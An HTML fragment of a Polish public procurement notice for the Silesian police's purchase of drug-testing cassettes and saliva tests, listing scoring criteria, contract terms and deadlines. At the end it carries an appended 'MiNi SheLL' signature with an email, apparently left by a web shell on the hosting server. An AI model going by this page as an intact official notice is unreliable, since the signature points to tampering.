najniższa cena oferty brutto<br/>Cbad - cena brutto badanej oferty<br/>2.1.1 Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60<br/>b) inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2 zasady przyznawania punktów<br/>a) Wartości liczone będą do dwóch miejsc po przecinku<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>2.2. kryterium B - wydłużony termin gwarancji i termin ważności. Ocena będzie dokonywana poprzez zastosowanie poniższych<br/>zasad spośród ofert niepodlegających odrzuceniu.<br/>Wykonawca może wydłużyć gwarancję i termin ważności o wartość wskazaną poniżej tj. przedłużyć minimalną gwarancję oraz termin ważności wskazany dla każdej części w formularzu cenowym o okres wskazany poniżej.<br/>Zamawiający przyzna wykonawcy następującą ilość punktów :<br/>- w przypadku przedłużenia o 12 miesięcy – 40 pkt<br/>- w przypadku przedłużenia o 9 miesięcy – 30 pkt<br/>- w przypadku przedłużenia o 6 miesięcy – 20 pkt<br/>- w przypadku przedłużenia o 3 miesiące – 10 pkt<br/>- gwarancja podstawowa wskazana w formularzu cenowym – 0 pkt.<br/>W przypadku zaoferowania innego okresu ( np. 6,5 miesiąca) niż wskazany powyżej oferta wykonawcy zostanie przeliczona z<br/>zaokrągleniem w dół (czyli 6 miesięcy). W przypadku braku deklaracji co do przedłużenia gwarancji Zmawiający uzna, że<br/>Wykonawca zaoferował minimalny wymagany okres gwarancji oraz termin ważności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużony termin gwarancji i termin ważności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 2 PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa zadania: Zakup i dostawa kaset do elektronicznych urządzeń służących do badania kierujących na zawartość środków działających podobnie do alkoholu i testów jednorazowego użytku do wstępnego wykrywania w ślinie środków działających podobnie do alkoholu na potrzeby garnizonu śląskiego

Creat By MiNi SheLL
Email: jattceo@gmail.com